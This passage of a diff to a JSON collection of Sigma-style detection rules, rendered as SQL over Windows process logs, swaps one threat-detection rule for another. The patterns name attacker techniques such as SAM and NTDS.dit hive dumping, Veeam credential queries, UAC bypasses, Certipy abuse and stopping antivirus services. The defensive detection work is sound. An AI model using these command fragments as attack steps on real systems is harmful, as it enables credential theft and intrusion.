NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_import_keys_ads.yml" + "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" }, { - "title": "Bypass UAC via CMSTP", - "id": "e66779cc-383e-4224-a3a4-267eeb585c40", - "status": "test", - "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer 
(cmstp.exe) to install specially formatted local .INF files", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Potential Renamed Rundll32 Execution", + "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", + "status": "experimental", + "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002", - "attack.t1218.003" + "attack.execution" ], "falsepositives": [ - "Legitimate use of cmstp.exe utility by legitimate user" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_cmstp.yml" + "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" }, { - "title": "Renamed NetSupport RAT Execution", - "id": "0afbd410-de03-4078-8491-f132303cb67d", + "title": "Suspicious Key Manager Access", + "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", "status": "experimental", - "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the invocation of the Stored 
User Names and Passwords dialogue (Key Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_netsupport_rat.yml" + "filename": "proc_creation_win_rundll32_keymgr.yml" }, { - "title": "Windows Admin Share Mount Via Net.EXE", - "id": "3abd6094-7027-475f-9630-8ab9be7b9725", - "status": "test", - "description": "Detects when an admin share is mounted using net.exe", - "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", + "title": "Exploit for CVE-2015-1641", + "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "status": "stable", + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Administrators" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE 
'\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '% \\\\%\\\\%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_net_use_mount_admin_share.yml" + "filename": "proc_creation_win_exploit_cve_2015_1641.yml" }, { - "title": "Sensitive Registry Access via Volume Shadow Copy", - "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", - "status": "experimental", - "description": "Detects a command that accesses password storing registry hives via volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "New User Created Via Net.EXE With Never Expire Option", + "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "status": "test", + "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Some rare backup scenarios" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE 
'%expires:never%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_conti_shadowcopy.yml" + "filename": "proc_creation_win_net_user_add_never_expire.yml" }, { - "title": "Nltest.EXE Execution", - "id": "903076ff-f442-475a-b667-4f246bcc203b", - "status": "experimental", - "description": "Detects nltest commands that can be used for information discovery", - "author": "Arun Chauhan", + "title": "Lazarus Group Activity", + "id": "24c4d154-05a4-4b99-b57d-9b977472443a", + "status": "test", + "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.discovery", - "attack.t1016", - "attack.t1018", - "attack.t1482" + "attack.g0032", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate administration activity" + "Unlikely" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE 
'%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_nltest_execution.yml" + "filename": "proc_creation_win_apt_lazarus_group_activity.yml" }, { - "title": "Exchange PowerShell Snap-Ins Usage", - "id": "25676e10-2121-446e-80a4-71ff8506af47", - "status": "experimental", - "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", - "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", + "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", + "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", + "status": "test", + "description": "Detects dump of credentials in VeeamBackup dbo", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.collection", - "attack.t1114" + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND 
CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_snapins_hafnium.yml" + "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" }, { - "title": "Winword LOLBIN Usage", - "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", - "status": "experimental", - "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Victor Sergeev, oscd.community", + "title": "UAC Bypass Using NTFS Reparse Point - Process", + "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "status": "test", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' 
AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_winword.yml" + "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "Suspicious Greedy Compression Using Rar.EXE", - "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", + "title": "HackTool - Certipy Execution", + "id": "6938366d-8954-4ddc-baff-c830b3ba8fcd", "status": "experimental", - "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", - "author": "X__Junior, Florian Roth", + "description": "Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel 
= 'Security') AND ((NewProcessName LIKE '%\\\\Certipy.exe' ESCAPE '\\' OR OriginalFileName = 'Certipy.exe' OR Description LIKE '%Certipy%' ESCAPE '\\') OR ((CommandLine LIKE '% auth %' ESCAPE '\\' OR CommandLine LIKE '% find %' ESCAPE '\\' OR CommandLine LIKE '% forge %' ESCAPE '\\' OR CommandLine LIKE '% relay %' ESCAPE '\\' OR CommandLine LIKE '% req %' ESCAPE '\\' OR CommandLine LIKE '% shadow %' ESCAPE '\\') AND (CommandLine LIKE '% -bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -ca-pfx %' ESCAPE '\\' OR CommandLine LIKE '% -dc-ip %' ESCAPE '\\' OR CommandLine LIKE '% -kirbi%' ESCAPE '\\' OR CommandLine LIKE '% -old-bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -pfx %' ESCAPE '\\' OR CommandLine LIKE '% -target%' ESCAPE '\\' OR CommandLine LIKE '% -username %' ESCAPE '\\' OR CommandLine LIKE '% -vulnerable%' ESCAPE '\\' OR CommandLine LIKE '%auth -pfx%' ESCAPE '\\' OR CommandLine LIKE '%shadow auto%' ESCAPE '\\' OR CommandLine LIKE '%shadow list%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_rar_susp_greedy_compression.yml" + "filename": "proc_creation_win_hktl_certipy.yml" }, { - "title": "Hiding Files with Attrib.exe", - "id": "4281cb20-2994-4580-aa63-c8b86d019934", - "status": "test", - "description": "Detects usage of attrib.exe to hide files from users.", - "author": "Sami Ruohonen", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", + "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "status": "experimental", + "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is 
the parent of the cmd.exe)", - "Msiexec.exe hiding desktop.ini" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +h %' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\desktop.ini %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '+R +H +S +A \\\\\\*.cui' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\\\*.bat' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_attrib_hiding_files.yml" + "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" }, { - "title": "User Discovery And Export Via Get-ADUser Cmdlet", - "id": "1114e048-b69c-4f41-bc20-657245ae6e3f", + "title": "Use of UltraViewer Remote Access Software", + "id": "88656cec-6c3b-487c-82c0-f73ebb805503", "status": "experimental", - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly 
used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADUser %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UltraViewer' OR Company = 'DucFabulous Co,ltd' OR OriginalFileName LIKE 'UltraViewer\\_Desktop.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_user_discovery_get_aduser.yml" + "filename": "proc_creation_win_remote_access_software_ultraviewer.yml" }, { - "title": "Suspicious Compression Tool Parameters", - "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", - "status": "test", - "description": "Detects suspicious command line arguments of common data compression tools", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Potential Download/Upload Activity Using Type Command", + "id": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", + "status": 
"experimental", + "description": "Detects usage of the \"type\" command to download/upload data from WebDAV server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > \\\\\\\\\\*' ESCAPE '\\') OR (CommandLine LIKE '%type \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_compression_params.yml" + "filename": "proc_creation_win_lolbin_type.yml" }, { - "title": "Rundll32 Registered COM Objects", - "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "title": "Suspicious Driver Install by pnputil.exe", + "id": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", "status": "test", - "description": "load malicious registered COM objects", - "author": "frack113", + "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", + "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", "tags": [ - "attack.privilege_escalation", "attack.persistence", - "attack.t1546.015" + "attack.t1547" ], "falsepositives": [ - "Legitimate use" + "Pnputil.exe being used may be performed by a system 
administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/install%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/add-driver%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\pnputil.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_registered_com_objects.yml" + "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" }, { - "title": "DevInit Lolbin Download", - "id": "90d50722-0483-4065-8e35-57efaadd354d", - "status": "test", - "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Product Class Reconnaissance Via Wmic.EXE", + "id": "e568650b-5dcd-4658-8f34-ded0b1e13992", + "status": "experimental", + "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", + "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", "tags": [ "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": 
"medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND CommandLine LIKE '% -i http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%AntiVirusProduct%' ESCAPE '\\' OR CommandLine LIKE '%FirewallProduct%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_devinit.yml" + "filename": "proc_creation_win_wmic_recon_product_class.yml" }, { - "title": "Process Dump via RdrLeakDiag.exe", - "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION", + "id": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", "status": "test", - "description": "Detects a process memory dump performed by RdrLeakDiag.exe", - "author": "Cedric MAURUGEON", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND OriginalFileName = 'RdrLeakDiag.exe' AND CommandLine LIKE '%fullmemdmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (CommandLine LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR CommandLine LIKE '%system.io.streamreader%' ESCAPE '\\' OR CommandLine LIKE '%readtoend(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_compress.yml" }, { - "title": "Change Default File Association To 
Executable Via Assoc", - "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", + "title": "Suspicious Windows Service Tampering", + "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", "status": "experimental", - "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.persistence", - "attack.t1546.001" + "attack.defense_evasion", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Administrators or tools shutting down the services due to upgrade or removal purposes. 
If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE 